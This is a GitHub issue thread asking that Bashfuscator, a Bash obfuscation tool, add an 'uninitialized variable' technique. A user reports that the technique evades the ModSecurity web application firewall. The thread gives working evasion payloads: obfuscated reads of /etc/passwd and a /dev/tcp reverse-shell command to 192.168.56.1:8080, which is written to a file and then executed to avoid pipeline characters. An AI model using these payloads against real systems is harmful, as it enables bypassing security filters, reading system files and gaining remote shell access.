-
Notifications
You must be signed in to change notification settings - Fork 178
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add The Uninitialized Variable obfuscate to mutators #25
Comments
Bashfuscator already does this to a certain extent; the special variables Generating randomly named variables and inserting them in Bash payloads is pretty risky... Bashfuscator can't know what variables will be already used in the environment in which payloads will be run, so there is a chance that payloads will fail in certain environments. For instance, say that in the environment you're currently in, the variable |
I noticed about this before i created the issue. But current modules use pipeline to execute command so it can't bypass waf (mod security for example). So is there any chance to run command without pipeline (like add options
Understood :D |
I've tested this method and it bypassed mod security perfectly so i think it will be wonderful if bashfucscator can add this method.
Test case 1:
ls -la
get blocked by mod securityls$u -la
workedTest case 2:
cat /etc/passwd
get blocked by mod securitycat$u /etc$x/passwd$y
workedTest case 3:
-
/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1
doesn't get blocked but it can't create connection (reverse shell) so i did it manually (Use pipeline may have blocked by mod security by characters|
,;
,&&
)Step 1:
echo$x "/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1" > file name
Step 2:
bash$a filename
Source:
https://www.secjuice.com/web-application-firewall-waf-evasion/
The text was updated successfully, but these errors were encountered: